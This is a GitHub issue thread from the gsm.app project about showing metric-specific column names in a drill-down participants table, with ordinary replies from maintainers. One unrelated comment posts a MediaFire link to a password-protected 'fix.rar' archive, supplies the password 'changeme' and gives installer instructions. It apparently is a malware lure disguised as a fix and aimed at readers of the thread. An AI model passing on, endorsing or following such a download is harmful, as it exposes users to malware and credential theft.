### ISSUE TITLE
Feature: Show Metric details inside table_participants_by_site?

### ISSUE THREAD

**Issue by jonthegeek** [Gilead-BioStats/gsm.app#202]
## Feature Details
As an app user, in order to more quickly understand what I'm looking at, I'd like to see the metric's numerator, denominator, and metric in the colnames when I drill down, rather than "Numerator", "Denominator", and "Metric". 

## Additional Comments
I think we can remove the Metric Metadata module if we do this. Or potentially we'd have metric metadata + tabset on the Metric Details tab, and add a Site Details tab. Let's discuss this option while this is being implemented.

**Comment by huangzhaor** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by taylorrodgers** [comment]
This will be on next PR. Posting screenshot here:
![image](https://github.com/user-attachments/assets/62a385a5-c48b-4afc-80f0-9d7165d049c9)

**Comment by jonthegeek** [comment]
It looks a LITTLE weird in the narrow table, but I'm hoping to rearrange things a little such that the table will get a bit more room, at which point I think it will look great. Thanks!
